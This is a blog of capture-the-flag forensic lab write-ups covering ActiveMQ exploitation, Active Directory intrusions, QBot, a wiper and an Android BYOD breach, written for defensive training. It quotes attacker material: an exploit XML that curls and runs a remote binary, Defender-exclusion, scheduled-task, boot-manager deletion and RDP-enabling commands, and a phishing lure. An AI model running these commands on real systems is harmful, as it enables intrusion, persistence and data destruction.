Little Cybersecurity Adventures

Bernardo's Blog

## Intro Text

> During your shift as a tier-2 SOC analyst, you receive an escalation from a tier-1 analyst regarding a public-facing server. This server has been flagged for making outbound connections to multiple suspicious IPs. In response, you initiate the standard incident response protocol, which includes isolating the server from the network to prevent potential lateral movement or data exfiltration and obtaining a packet capture from the NSM utility for analysis. Your task is to analyze the pcap and assess for signs of malicious activity.

A link to the lab can be found here: https://cyberdefenders.org/blueteam-ctf-challenges/openwire/

## Questions

1. By identifying the C2 IP, we can block traffic to and from this IP, helping to contain the breach and prevent further data exfiltration or command execution. Can you provide the IP of the C2 server that communicated with our server?

    I immediately spotted the OpenWire communications that went on in the first few packets. Based on that, and the fact the lab description told us that an Apache ActiveMQ instance was being exploited, I put the two and two together and determined that the initiator of this communication was the C2 server, so I just copied the source IP of the first TCP request.

    ![Wireshark window](/images/OpenWire/image.png)

2. Initial entry points are critical to trace the attack vector back. What is the port number of the service the adversary exploited?

    Still looking at that first request, we can see that the attacker tried to connect directly to port `61616` on our server.

3. Following up on the previous question, what is the name of the service found to be vulnerable?

    Looking at the OpenWire Protocol chatter in the same TCP stream as the first request, we can infer that `Apache ActiveMQ` is being used.

4. The attacker's infrastructure often involves multiple components. What is the IP of the second C2 server?

    If we continue inspecting the packets, we can see that our server makes a request to the C2 server, requesting a `XML` file from it (ruh roh 😬). Looking at the file being requested, we can see that it will try to start a new process and download a file from the attacker's second C2 server: `128.199.52.72`

    ```xml
        GET /invoice.xml HTTP/1.1
        Cache-Control: no-cache
        Pragma: no-cache
        User-Agent: Java/11.0.21
        Host: 146.190.21.92:8000
        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
        Connection: keep-alive


        HTTP/1.0 200 OK
        Server: SimpleHTTP/0.6 Python/3.8.10
        Date: Tue, 12 Dec 2023 13:38:28 GMT
        Content-type: application/xml
        Content-Length: 816
        Last-Modified: Tue, 12 Dec 2023 13:37:45 GMT

        <?xml version="1.0" encoding="UTF-8" ?>
            <beans xmlns="http://www.springframework.org/schema/beans"
            xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
            xsi:schemaLocation="
            http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
                <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
                    <constructor-arg >
                    <list>
                        
                        <value>bash</value>
                        <value>-c</value>
                        <value>curl -s -o /tmp/docker http://128.199.52.72/docker; chmod +x /tmp/docker; ./tmp/docker</value>
                    </list>
                    </constructor-arg>
                </bean>
            </beans>

    ```

5. Attackers usually leave traces on the disk. What is the name of the reverse shell executable dropped on the server?

    We can see this clearly on the file above, the file name is `docker`, likely as an effort to "obfuscate" the malicious process when an sysadmin is looking at the system.

6. What Java class was invoked by the XML file to run the exploit?

    Same as above, we can see this in the file above, it attempts to use `java.lang.ProcessBuilder` to remotely execute code on our server.

7. To better understand the specific security flaw exploited, can you identify the CVE identifier associated with this vulnerability?

    Searching on Google for "apache mq openwire cve" we can find a lot of data on `CVE-2023-46604`, which seems to be the vulnerability we're looking at.

8. The vendor addressed the vulnerability by adding a validation step to ensure that only valid Throwable classes can be instantiated, preventing exploitation. In which Java class and method was this validation step added?

    Ooooh I loved this question!! Very nice! Sadly for my love of analyzing code, the answer was immediately in front of me when I opened the github changes, but I still liked this kind of question! The class and method patched were `BaseDataStreamMarshaller.createThrowable`.

## Conclusion

Another good lab exploring a kinda simple exploit, thank you CyberDefenders for the chance to practice our skills!

Investigate a Java deserialization vulnerability in Apache ActiveMQ that enables remote code execution through insecure class loading.

CyberDefenders - OpenWire


## Intro Text

> As a cybersecurity analyst at TechSecure Corp, you have been alerted to unusual activities within the company's Active Directory environment. Initial reports suggest unauthorized access and possible privilege escalation attempts.

> Your task is to analyze the provided logs to uncover the attack's extent and identify the malicious actions taken by the attacker. Your investigation will be crucial in mitigating the threat and securing the network.

A link to the lab can be found here: https://cyberdefenders.org/blueteam-ctf-challenges/shadowroast/

To help with this search, I used [this cheatsheet](https://github.com/webpro255/Windows-Sysmon-Threat-Hunting-Guide), as I found it to be a good list for important Event Ids, I haven't seen a lot of them with all the info on one page, that can be easily searchable.

## Questions

1. What's the malicious file name utilized by the attacker for initial access?

    We can get this information by filtering by the Event ID 1 from Sysmon, to filter for process creation and using `dedup` to remove duplicate the duplicate Images (executables) being started. Doing this, we can parse the two pages of results to find out a single executable being ran from the downloads folder, named `AdobeInstaller.exe` 

    ![Splunk results, containing the Adobe Installer.exe file we're looking for](/images/ShadowRoast/image.png)

2. What's the registry run key name created by the attacker for maintaining persistence?

    We can filter for Event ID 13 to find "Registry Key Access" events, and then by logs that have `AdobeInstaller.exe` as their Image. The search query I used was: `index="shadowroast" AND event.code=13 AND "winlog.event_data.Image"=*Adobe*`. From here, we can see that `wyW5PZyF` was the key created.

    ![alt text](/images/ShadowRoast/image-1.png)

3. What's the full path of the directory used by the attacker for storing his dropped tools?


    We can reuse the filter from the last question, we just need to change the Event Code from 13 to 11, as it is the Sysmon event ID for File Creation. There are only 3 events associated with it, so we can easily see that the path is `C:\Users\Default\AppData\Local\Temp\`

    ![alt text](/images/ShadowRoast/image-2.png)

4. What tool was used by the attacker for privilege escalation and credential harvesting?

    We can start by filtering by Event ID 1 and then using the file names of the tools we found in the last question. The query that finds the tool is: `index="shadowroast" AND event.code=1 AND "winlog.event_data.Image"=*BackupUtility*`. Looking into the Original File Name of the file, we can see that it's `Rubeus`, a common tool used to extract credentials.

    ![alt text](/images/ShadowRoast/image-4.png)

5. Was the attacker's credential harvesting successful? If so, can you provide the compromised domain account username?

    If we keep analyzing the tools found in the Temp Folder, we can find that another of the files was executed, this one being a cover-up for `mimikatz`, bu we can also see that the user that started the executable was a different one to the one we'd been seeing so far, which was `sanderson`. When executing `mimikatz`, the user is `tcooper`! So from that, we can infer that `Rubeus` was successful in compromising at least one other domain account.

    ![alt text](/images/ShadowRoast/image-5.png)

6. What's the tool used by the attacker for registering a rogue Domain Controller to manipulate Active Directory data?

    Oops, we accidentally found this in the last question 😁, it's `mimikatz`. There is probably more to it, but I just put it into the answer field and it hit 😅.

7. What's the first command used by the attacker for enabling RDP on remote machines for lateral movement?

    Searching on how to enable RDP from the command line, I found [this information](https://www.reddit.com/r/PowerShell/comments/8qbxn5/enabling_rdp/) on Reddit, so I just filtered for Event ID 1 and then for `fDeny` in the Command Line, which gave us the following command being ran (edited to fit the answer key):  `reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0`

    ![alt text](/images/ShadowRoast/image-6.png)

8. What's the file name created by the attacker after compressing confidential files?

    This one is also pretty easy to solve, all we need to do is filter for `File Creation` events (ID 11), and then check the created filename for common archive extensions, in my case, I was lucky, and got it right on the first time, by searching for `.zip`. The created file is "CrashDump.zip"

    ![alt text](/images/ShadowRoast/image-7.png)

## Conclusion 

    This one felt pretty easy for a medium lab, but was still pretty interesting, with the files being dropped with the altered names, to escape automatic detection, and with the filtering for the RDP information, I had never searched it this way.

    Best Regards,

    Bernardo

Investigate and analyze malicious activity in an Active Directory environment using log analysis and Splunk queries to identify initial access, persistence, lateral movement, and data exfiltration techniques.

CyberDefenders - ShadowRoast


## Intro Text

> A company's security team detected unusual network activity linked to a potential malware infection. As a forensic analyst, your mission is to investigate a memory dump, identify the malicious process, extract artifacts, and uncover Command and Control (C2) communications. Using Volatility3, analyze the attack, trace its origin, and provide actionable intelligence.

A link to the lab can be found here: https://cyberdefenders.org/blueteam-ctf-challenges/QBot/

To answer these questions, we'll need to use Volatility 3, which is a great tool that no matter how many times I've used it, I seem to forget all the options to whenever I use it 😅. [So I'll be using this cheat sheet as reference while competing this task.](https://blog.onfvp.com/post/volatility-cheatsheet/) 

## Questions

1. Our first step is identifying the initial point of contact the malware made with an external server. Can you specify the first IP address the malware attempted to communicate with?

    We can use the `windows.netscan` plugin on the memory dump to retrieve all the connections present in the dump.

    ```bash
        ubuntu@ip-172-31-38-130:~/Desktop/Start here/Artifacts$ vol.py -f memory.dmp windows.netscan
        Volatility 3 Framework 2.5.0
        Progress:    0.00		Scanning WindowsCrashDump64Layer using PageMapScProgress:    0.00		Scanning WindowsCrashDump64Layer using PageMapScProgress:   23.33		Scanning WindowsCrashDump64Layer using PageMapScProgress:    0.00		Scanning WindowsCrashDump64Layer using PageMapScProgress:  100.00		Stacking attempts finished                      Progress:    0.00		Scanning memory_layer using BytesScanner        Progress:    0.32		Scanning memory_layer using BytesScanner        Progress:    0.63		Scanning memory_layer using BytesScanner        Progress:    0.00		Scanning layer_name using PdbSignatureScanner   Progress:    0.00		Scanning layer_name using PdbSignatureScanner   Progress:  100.00		PDB scanning finished                                
        Offset	Proto	LocalAddr	LocalPort	ForeignAddr	ForeignPort	State	PID	Owner	Created

        0x950000047010	TCPv4	192.168.58.135	50120	13.107.22.239	443	ESTABLISHED	-	-	N/A
        0x95000005d2c0	TCPv4	0.0.0.0	5040	0.0.0.0	0	LISTENING	3788	svchost.exe	2023-10-12 11:35:52.000000 
        0x95000005ed80	TCPv4	192.168.58.135	139	0.0.0.0	0	LISTENING	4System	2023-10-12 11:35:57.000000 
        0x9500001637b0	UDPv4	0.0.0.0	16528	*	0		3700	svchost.exe	2023-10-12 11:35:57.000000 
        0x9500001637b0	UDPv6	::	16528	*	0		3700	svchost.exe	2023-10-12 11:35:57.000000 
        0x950000163bd0	UDPv4	0.0.0.0	0	*	0		1480	svchost.exe	2023-10-12 11:35:57.000000 
        0x950000163bd0	UDPv6	::	0	*	0		1480	svchost.exe	2023-10-12 11:35:57.000000 
        0x9500001f8010	TCPv4	192.168.58.135	49781	20.199.120.182	443	ESTABLISHED	-	-	N/A
        0x9500001f8420	TCPv4	192.168.58.135	50460	94.140.112.73	80	CLOSED	--	N/A
        0xcd8eeda705e0	TCPv4	192.168.58.135	50457	52.111.236.23	443	ESTABLISHED	-	-	N/A
        0xcd8eeda931b0	UDPv4	0.0.0.0	16608	*	0		3700	svchost.exe	2023-10-12 11:35:57.000000
    ```

    We can see some external Ip addresses here, but loading them into something like VirusTotal, we can see that the first two on the list are Microsoft owned IPs, that _should_ be safe. The third one though, although it is now marked as safe in VirusTotal, inspecting the Relations tab, we can see that it has been used to host all kinds of malware. So the answer is `94.140.112.73`.

    ![Virus Total output of the Relations tab of the IP](/images/QBot/image.png)

2. We need to determine if the malware attempted to communicate with another IP. Which IP address did the malware attempt to communicate with again?

    There are various IP addresses in the output of `windows.netscan` that have been marked as malicious in the past (multiple of them even match the format specified for this question 😅), but through trial and error I found that the last connection in the output contained the desired IP address. And then plugging `45.147.230.104` into VirusTotal we can see that it has also been used to host malicious files.

    ![Virus Total output of the header of the IP, containing a 7/92 community score](/images/QBot/image-3.png)

    After answering the question, I looked into the solutions to see how I was supposed to know which IP I was supposed to choose. They analyze the whole dump in a deeper fashion during the data gathering in the first question, and therefore it's obvious which IP address should be the answer of this question. While I feel that the way their analysis was done was the most "correct" way of doing it, I also feel that the order of the questions should "train" us into doing it the "correct" way, but I feel that in the case of this lab, it's a bit disjointed. I feel that the questions should guide the exploration, like the lab name implies (at least to me).

3. Identifying the process responsible for this suspicious behavior helps reconstruct the sequence of events leading to the execution of the malware and its source. What is the name of the process that initiated the malware?

   Using `windows.pstree`, we can see the process tree of all programs running in the system when the dump was captured. Inside the user session (at least I think that's what it means when the processes are indented under `winlogon.exe`), we can find `excel.exe` running, which can be a common vector for malware infection.

   ![Volatility 3 output, containing a suspicious EXCEL.EXE process under the user session](/images/QBot/image-4.png)

4. The malware's file name is crucial for further forensic analysis and extracting the malware. Can you provide its file name?

    To find this out, we need to dump all files associated with the excel process running, to do that we can use the `windows.dumpfile` plugin in volatility, taking care to pass the process ID instead of the parent's process ID (the process ID is the one that is the most ot the left on the above screenshot). This command will take a long time to run though, so you can go and take a little break after starting it 😛.

    ![Screenshot of the command described above, containing a lot of output from the command, a lot of miscellaneous files being recovered, none of them interesting](/images/QBot/image-5.png)

    The command gives us way too many files to analyze for us to do by hand, so we can start by filtering the files by common file extensions, like xls, xlsm etc; and doing that, we find our file!

    ```bash
    ubuntu@ip-172-31-38-130:~/Desktop/Start here/Artifacts/dmp$ ls | grep xl
    file.0xcd8ef507ac60.0xcd8ef514f5d0.DataSectionObject.Payment.xls.dat
    ```

    The file we're looking for is `Payment.xls`

5. Hashes are like digital fingerprints for files. Once the hash is known, it can be used to scan other systems within the network to identify if the same malicious file exists elsewhere. What is the SHA256 hash of the malware?

    Now that we have the file, this is trivial to answer, we just need to use `sha256sum` on it.

    ```
    ubuntu@ip-172-31-38-130:~/Desktop/Start here/Artifacts/dmp$ sha256sum file.0xcd8ef507ac60.0xcd8ef514f5d0.DataSectionObject.Payment.xls.dat 
    3cef2e4a0138eeebb94be0bffefcb55074157e6f7d774c1bbf8ab9d43fdbf6a4  file.0xcd8ef507ac60.0xcd8ef514f5d0.DataSectionObject.Payment.xls.dat
    ```

6. To trace the origin of the malware and understand its development timeline, can you provide the UTC creation time of the malware file?

    Be not confused, this isn't asking for when the file was created on disk, but when the file was "really" created. To do this, we simply need to plug in the hash we got from the last question into VirusTotal. The creation time is `2015-06-05 18:17:20 UTC`

    ![VirusTotal Details Pane, containing all sorts of data about the malware submitted, including the creation time of the file.](/images/QBot/image-6.png)

Reconstruct the QBot malware infection timeline by analyzing memory dumps, identifying malicious processes, files, and network communications using Volatility3 and VirusTotal.

CyberDefenders - QBot Lab

This lab aims to equip learners with practical skills in malware analysis by dissecting a multi-stage AsyncRAT infection. Participants will explore obfuscation techniques, payload extraction, persistence mechanisms, and steganographic methods used in real-world malware, enhancing their ability to detect, analyze, and respond to complex cyber threats.

CyberDefenders - AsyncRAT


## Intro Text

> As a cybersecurity analyst at SecureTech Industries, you've been alerted to unusual login attempts and unauthorized access within the company's network. Initial indicators suggest a potential brute-force attack on user accounts. Your mission is to analyze the provided log data to trace the attack's progression, determine the scope of the breach, and the attacker's TTPs.

A link to the lab can be found here: https://cyberdefenders.org/blueteam-ctf-challenges/goldenspray/

## Questions

1. What is the attacker's IP address?

    Searching the Internet, we can learn that the Windows Event ID that pertains to Failed Login Attempts is 4625, so we can filter our data by this event ID and analyze the data from there.

    ![alt text](/images/GoldenSpray/image.png)

    There are multiple fields containing IPs, but one of them is a local network IP (192.168.xxx.xxx), so we can focus on `winlog.event_data.IpAddress`. Only one of the values present is `77.91.78.115` is a public IP, all the other ones are local IPs (technically one local and the other is a loopback address).

2. What country is the attack originating from?

    We just need to throw this into an IP Geolocator, and in this case, we can see it's from Finland.

    ![alt text](/images/GoldenSpray/image-1.png)

3. What's the compromised account username used for initial access?

    The event code for a successful login is 4624, so combining it with the detected IP, we can generate a filter to find out which accounts were logged into by our attacker. The filter should be `event.code: 4624 and winlog.event_data.IpAddress: 77.91.78.115`.

    ![alt text](/images/GoldenSpray/image-2.png)

    The first account used seems to be `michaelwilliams` but it isn't the right answer, the first one is actually `mwilliams`. The answer wants a domain attached to the name, so we can also find the `SECURETECH` domain in the event data.

4. What's the name of the malicious file utilized by the attacker for persistence on ST-WIN02?

    We can use Sysmon Event Code 11 to detect created files, and starting from there we can filter for common file types that were created around the time of the attack (5-ish). The filter `event.code:11 and winlog.event_data.TargetFilename : *exe` reveals to us that an `OfficeUpdater.exe` file is created in the Temp directory.

    ![alt text](/images/GoldenSpray/image-3.png)

5. What is the complete path used by the attacker to store their tools?

    Immediately above the previous answer's file, we can see that two tools were stored into `C:\Users\Public\Backup_Tools`.

6. What's the process ID of the tool responsible for dumping credentials on ST-WIN02?

    From the two tools seen above, `mimikatz.exe` is the one normally used for credential dumping, so we need to filter for it, and find the PID associated with its usage.

    ![alt text](/images/GoldenSpray/image-4.png)

    While we find multiple events associated with `mimikatz`, the first one of them with sysmon event ID 1 (Process Created) has PID 3708.

7. What's the second account username the attacker compromised and used for lateral movement?

    Going back to the filter with event code 4624, we can find another username: `jsmith`

    ![alt text](/images/GoldenSpray/image-5.png)

8. Can you provide the scheduled task created by the attacker for persistence on the domain controller?


    `schtasks` is commonly used to create scheduled tasks, so I just filtered for it and immediately found the event we were looking for 😁. The task's name is `FilesCheck` and it runs a executable file hourly as `SYSTEM`.
    
    ![alt text](/images/GoldenSpray/image-6.png)

9. What type of encryption is used for Kerberos tickets in the environment?


    The event IDS associated with Kerberos tickets being granted are 4768 and 4769, so we can filter for them and find the encryption being used, if we find any ticket being issued.

    ![alt text](/images/GoldenSpray/image-7.png)

    Looking at the encryption type, we can see that it's `0x17`, searching online, we can see that this matches [RC4-HMAC](https://system32.eventsentry.com/codes/field/Kerberos%20Encryption%20Types), an outdated encryption type.

10. Can you provide the full path of the output file in preparation for data exfiltration?

    We can filter for Sysmon event 11 (File Creation) and hopefully we can find something...

    ![alt text](/images/GoldenSpray/image-9.png)

    Yikes, that's a lot of files, what happens if we filter for zip files?

    ![alt text](/images/GoldenSpray/image-8.png)

    Much better, we can see that our file is `C:\Users\Public\Documents\Archive_8673812.zip`

Another great lab to gain our SIEM and Windows Event Analysis legs! Thanks to CyberDefenders for creating this!

Have a good one,

Bernardo
    

Reconstruct a multi-stage intrusion timeline by analyzing Windows and Sysmon event logs within Elastic SIEM to identify key attack tactics, techniques, and procedures.

CyberDefenders - GoldenSpray


## Intro Text

> A critical network infrastructure has encountered significant operational disruptions, leading to system outages and compromised machines. Public message boards displayed politically charged messages, and several systems were wiped, causing widespread service failures. Initial investigations reveal that attackers compromised the Active Directory (AD) system and deployed wiper malware across multiple machines.
>
> Fortunately, during the attack, an alert employee noticed suspicious activity and immediately powered down several key systems, preventing the malware from completing its wipe across the entire network. However, the damage has already been done, and your team has been tasked with investigating the extent of the compromise.
>
> You have been provided with forensic artifacts collected via KAPE SANS Triage from one of the affected machines to determine how the attackers gained access, the scope of the malware's deployment, and what critical systems or data were impacted before the shutdown.

Link to lab: https://cyberdefenders.org/blueteam-ctf-challenges/meteorhit-indra/

## Questions

1. The attack began with using a Group Policy Object (GPO) to execute a malicious batch file. What is the name of the malicious GPO responsible for initiating the attack by running a script?

    To uncover the name of the malicious GPO, we can use Registry Explorer and look into the start-up scripts configured using GPOs, and we can find that `DeploySetup` is the name of the malicious GPO.

    ![Image of Registry Explorer showing the GPO name](/images/Meteor_Indra/image.png)

2. During the investigation, a specific file containing critical components necessary for the later stages of the attack was found on the system. This file, expanded using a built-in tool, played a crucial role in staging the malware. What is the name of the file, and where was it located on the system? Please provide the full file path.

    To answer this question, I used Event Log Explorer, like the official walkthrough uses. I had never used this tool, but as far as I can tell, it's basically Windows Event Viewer but good 😭. Doing a Ctrl-F for "expand", we can find the file we want being expanded: `C:\ProgramData\Microsoft\env\env.cab`

    ![Event Log Explorer log](/images/Meteor_Indra/image-1.png)

3. The attacker employed password-protected archives to conceal malicious files, making it important to uncover the password used for extraction. Identifying this password is key to accessing the contents and analyzing the attack further. What is the password used to extract the malicious files?

    Hitting up a few times, we can see a rar file being extracted almost immediatly after the expanding of the archive, and we can see the command line parameters including the password

    `CommandLine: "Rar.exe"  x "C:\ProgramData\Microsoft\env\programs.rar" -phackemall`

    ![alt text](/images/Meteor_Indra/image-2.png)

4. Several commands were executed to add exclusions to Windows Defender, preventing it from scanning specific files. This behavior is commonly used by attackers to ensure that malicious files are not detected by the system's built-in antivirus. Tracking these exclusion commands is crucial for identifying which files have been protected from antivirus scans. What is the name of the first file added to the Windows Defender exclusion list?

    Because the last question's solution was so good, I went ahead and did it again, only this time I had to hit up a few more times 😅. But this method was good to have a little understanding of how the exploit works, at least at a high-level. Eventually we come to a powershell proccess being created with `powershell  -Command "Add-MpPreference -Force -ExclusionPath '"C:\ProgramData\Microsoft\env"\update.bat'"`, so we can see that `update.bat` is the first file being added to the Windows Defender exclusion list. If we keep going, we can see that it also adds `Rar.exe` to the exclusion list afterwards.

    ![alt text](/images/Meteor_Indra/image-3.png)

5. A scheduled task has been configured to execute a file after a set delay. Understanding this delay is important for investigating the timing of potential malicious activity. How many seconds after the task creation time is it scheduled to run?

    Keeping up the same method, we can go up until we find a `schtasks.exe` process being created, with the following command line arguments: `schtasks  /CREATE /SC ONCE /ST 09:08:13 /TN "mstask" /RL HIGHEST /RU SYSTEM /TR "\""C:\ProgramData\Microsoft\env\env.exe"\" C:\temp\msconf.conf`, we can get the time from comparing the time, or by simply analysing the powershell command being ran just before this program, which just adds 3.5 minutes to the current time :grin: (`powershell  -command "(Get-Date).AddMinutes(3.5).ToString('HH:mm:ss')"`).

    ![alt text](/images/Meteor_Indra/image-4.png)

6. After the malware execution, the wmic utility was used to unjoin the computer system from a domain or workgroup. Tracking this operation is essential for identifying system reconfigurations or unauthorized changes. What is the Process ID (PID) of the utility responsible for performing this action?

    For this one, I gave up the up-arrow, and simply ctrl-F'd for `wmic.exe`, and we can quickly find the log containing the relevant information, for our purposes, the PID of wmic is 7492.

    ![alt text](/images/Meteor_Indra/image-5.png)

7. The malware executed a command to delete the Windows Boot Manager, a critical component responsible for loading the operating system during startup. This action can render the system unbootable, leading to serious operational disruptions and making recovery more difficult. What command did the malware use to delete the Windows Boot Manager?

    Searching for `bcdedit.exe`, we can find multiple references to it, I honestly just bruteforced this one and went on submitting all of the commands until one said it was good: `C:\Windows\Sysnative\bcdedit.exe  /delete {9dea862c-5cdd-4e70-acc1-f32b344d4795} /f`. Searching the identifier on google tells me this is the Windows Boot Manager identifier, but searching it the other way around didn't work that well for me... Oh well, you live and you learn.

    ![alt text](/images/Meteor_Indra/image-6.png)

8. The malware created a scheduled task to ensure persistence and maintain control over the compromised system. This task is configured to run with elevated privileges every time the system starts, ensuring the malware continues to execute. What is the name of the scheduled task created by the malware to maintain persistence?

    We can search for `schtasks.exe` again, and find a new command `ParentCommandLine: C:\Windows\System32\cmd.exe /c schtasks /CREATE /SC ONSTART /TN "Aa153!EGzN" /RL HIGHEST /RU SYSTEM /TR "\"C:\ProgramData\Microsoft\env\env.exe\" \"C:\temp\msconf.conf\"" /F`, so the name of the task is `Aa153!EGzN`.

    ![alt text](/images/Meteor_Indra/image-7.png)

9. A malicious program was used to lock the screen, preventing users from accessing the system. Investigating this malware is important to identify its behavior and mitigate its impact. What is the name of this malware? (not the filename)

    We can search the logs for `lock` and then we can see the MD5 hash of the malware, and then plug it into `VirusTotal`.

    ![alt text](/images/Meteor_Indra/image-8.png)

    ![alt text](/images/Meteor_Indra/image-9.png)

    According to the sources, it's `breakwin`

Reconstruct a wiper malware attack by analyzing registry, event logs, and USN journal artifacts using Registry Explorer, Event Log Explorer, and VirusTotal.

CyberDefenders - MeteorHit / Indra Lab



## Intro Text

> The SOC team detected malicious activity involving an employee who uses his personal Android device under the company's BYOD policy. The employee reported recently installing what appeared to be a legitimate financial application after being contacted on social media.
>  
> Initial triage indicates the incident may involve both the employee's personal device and corporate assets, with signs of potential data exfiltration. The timeline suggests the attack may have originated from the mobile device before affecting company resources.
>  
> You have been provided with data from both the Android device and Windows workstation. Your mission is to reconstruct the complete attack chain, identify all malicious components, and determine the full scope of the compromise.
> Splunk Credentials:
> 
> User: student
> Password: CyDefStudent

Pretty simple introduction, we can start by locating the artifacts that we were left with to carry out our investigation, we can see that we have an Android Image and a computer image.

![Pasted image 20260507155358.png](/images/Byod_Breach/1.png)

## Initial Access

1. **The threat actor used Discord to conduct a phishing campaign and deliver a malicious application by sending phishing messages to its victims. What is the timestamp when the first phishing message was sent to the victim? (in UTC)**

Let's dig into the the Android data, and find the data associated with Discord. Application data usually resides inside the `data/data` directory, and we can see that discord is indeed found there.

![Pasted image 20260507155358.png](/images/Byod_Breach/2.png)

After poking around, we can find an `sqlite` database which contains the Discord messages stored on the device, and filtering those by the string "APK" we can find 3 results:

![Pasted image 20260507155358.png](/images/Byod_Breach/3.png)

We can copy the data of the first row to read the JSON formatted message and metadata clearly, and we can read the message, promising riches to those who install a new  application which is not available in the Play Store (🚩🚩🚩) . We can also see the message timestamp on the metadata ().

```json
{"id":"1402978851033976874","channelId":"1260057237167018050","message":{"type":0,"content":"🚀 **EXCLUSIVE TRADING OPPORTUNITY** 🚀\n\n**Hey professional trader! **\n\nI know you're into new tech, so I thought you might find this interesting. I got into a closed beta for a new trading analysis tool called **TradingPro**.\n\nIt's not an auto-trader, but more of an AI-powered signal generator. It scans market data (stocks and crypto) and flags potential entry and exit points based on its algorithms. The idea is to help you spot opportunities you might otherwise miss.\n\nI've been using it to supplement my own research for a few weeks, and some of its calls have been impressively accurate. It's still a bit rough around the edges (it's a beta, after all), but the core tech seems really promising.\n\nThe dev team gave beta users a few invite codes to share for feedback before the public launch. The invite gives you free access for 6 months.\n\nHere’s my invite link if you want to check it out:\n[TradingPro.apk](https://download947.mediafire.com/ksko53k8zbnghfi24VNm5LrQVL9K7xDvwGUqblir8x6pGn5dTbqWWDvCxh0g_8Cgl745u5I7tXwjexpUs5yD_VPayF3gO5pJCqz_LRUGYTLGMrqj9iYQ3TQHg50UGG2BpGRN82SZomhRaRGv2j362rdIPoVAKnoU36smiys66oqKeT4/2ofb3adsq2qojdf/TradingPro.apk)\n\nCode: TradingPro_Beta8516584655\n\n(You have to sideload the APK on Android since it's not on the Play Store yet. Let me know what you think if you try it out).","mentions":[],"mention_roles":[],"attachments":[],"embeds":[],"timestamp":"2025-08-07T11:37:04.173000+00:00","edited_timestamp":null,"flags":0,"components":[],"id":"1402978851033976874","channel_id":"1260057237167018050","author":{"id":"1259338416290795682","username":"tradingpro9_","avatar":"d3a7da8f180e0087b33d91b828223b30","discriminator":"0","flags":0,"banner":null,"accent_color":null,"collectibles":null,"display_name_styles":null,"clan":null,"primary_guild":null,"(...)
}
```

## Execution

2. **The victim fell for the phishing campaign and installed the malicious application on his device. What is the package name of this malicious application?**

Using the `Trading Pro` name suggested by the Discord message, we can search the  `data/data` directory for a package name similar to it.
 
![Pasted image 20260507155358.png](/images/Byod_Breach/4.png)

These three bottom ones look particularly suspicious.`Telegram` by itself doesn't mean much, but it's rare that you see it without it being used in a not nefarious way. The answer they are looking for is `com.test.tradingpro`.

3. **When was the malicious application first installed on the device? (in UTC)?** 

We can find out the the application was installed by analysing the `packages.xml` file, which we can find in the `data/system` folder. The file is `ABX` encoded by default (Android Binary XML), so we need to decode it using `abx2xml`. 

![Pasted image 20260507155358.png](/images/Byod_Breach/5.png)

This can be done like so:

```powershell
PS C:\Users\Administrator\Desktop\Start Here\Tools\Mobile Forensics> .\abx2xml.exe ..\..\Artifacts\Android\data\system\p
ackages.xml
Successfully converted ..\..\Artifacts\Android\data\system\packages.xml to ..\..\Artifacts\Android\data\system\packages.
xml
```

According to the data I found in this [cheat-sheet](https://github.com/0xn3va/cheat-sheets/blob/main/Mobile%20Application/Android/Overview/package-manager.md), the `ft` field has the time when the application was last changed, which in our case should be the install time. 

![Pasted image 20260507155358.png](/images/Byod_Breach/6.png)

The data is represented as an UNIX timestamp `198845936c0`, which we can use an online tool to decode into an human-readable UTC timestamp. So the timestamp would be `2025-08-07 11:44`.

![Pasted image 20260507155358.png](/images/Byod_Breach/7.png)

 4. **The application registers an Accessibility Service to read sensitive on-screen content. What specific permission does the malware request to enable this capability?**

In the data we observed for the last question, we could find the code path for the malicious application, so we can just find the application and open it in `JADX`.

Inside the `ApplicationManifest.xml` file, we can see which permissions the app requests, the first one being `android.permission.BIND_ACCESSIBILITY_SERVICE`, which is the answer we are looking for.

![Pasted image 20260507155358.png](/images/Byod_Breach/8.png)

## Discovery 

5. The malware searches for remote desktop applications on the device to steal connection metadata. What is the package name of the targeted remote desktop application found on the victim’s device?

Poking around the decompiled app, we can find a file containing lists of applications, the first one being `com.anydesk.anydeskandroid`, which can also be found in the `packages.xml
file.

![Pasted image 20260507155358.png](/images/Byod_Breach/9.png)

![Pasted image 20260507155358.png](/images/Byod_Breach/10.png)

So from that, we can tell that the malware was able to find this application and try to use any data pertaining to it.

## Exfiltration

6. **The malicious application sends harvested data to an exfiltration server. What IP address does it contact for exfiltration?**

In the `h1g0` file, we can find a bunch of strings that look Base64 encoded. If we try to decode them, all we get is a jumbled mess, but by looking further into the code, we can see that the data is supposed to be Base64 decoded and then XOR encoded with the 42 value.

![Pasted image 20260507155358.png](/images/Byod_Breach/11.png)


```java
	        /* JADX INFO: Access modifiers changed from: private */
        public final String d(String s) {
            try {
                byte[] decoded = Base64.decode(s, 0);
                Intrinsics.checkNotNull(decoded);
                Collection arrayList = new ArrayList(decoded.length);
                for (byte b : decoded) {
                    arrayList.add(Byte.valueOf((byte) (b ^ 42)));
                }
                return new String(CollectionsKt.toByteArray((List) arrayList), Charsets.UTF_8);
            } catch (Exception e) {
                return s;
            }
        }

```

The IP Address we want isn't found in the same file, but in one of the other decoded files. The address the application tries to connect itself to is `http://18.199.240.228:5002`

![Pasted image 20260507155358.png](/images/Byod_Breach/12.png)

![Pasted image 20260507155358.png](/images/Byod_Breach/13.png)

## Lateral Movement

7. Using the exfiltrated data, the threat actor connected to the corporate workstation through AnyDesk. What is the AnyDesk connection address of the compromised Windows host?
Now we move from the Android data into the Windows Host data. Looking into the AnyDesk data on the PC, we can find the Id in the `system.conf` file.

![Pasted image 20260507155358.png](/images/Byod_Breach/14.png)

8. **When did the threat actor first connect to the corporate Windows host? (in UTC)**

By looking into the `ad_svc.trace` file, we can find a lot of connections, and looking into the ones happening in the 7th of August, we can find the following connection, starting at `2025-08-07 12:50` (Full disclosure, I tried some of the other connections first, not completely sure why this one was **the one**). 

![Pasted image 20260507155358.png](/images/Byod_Breach/15.png)
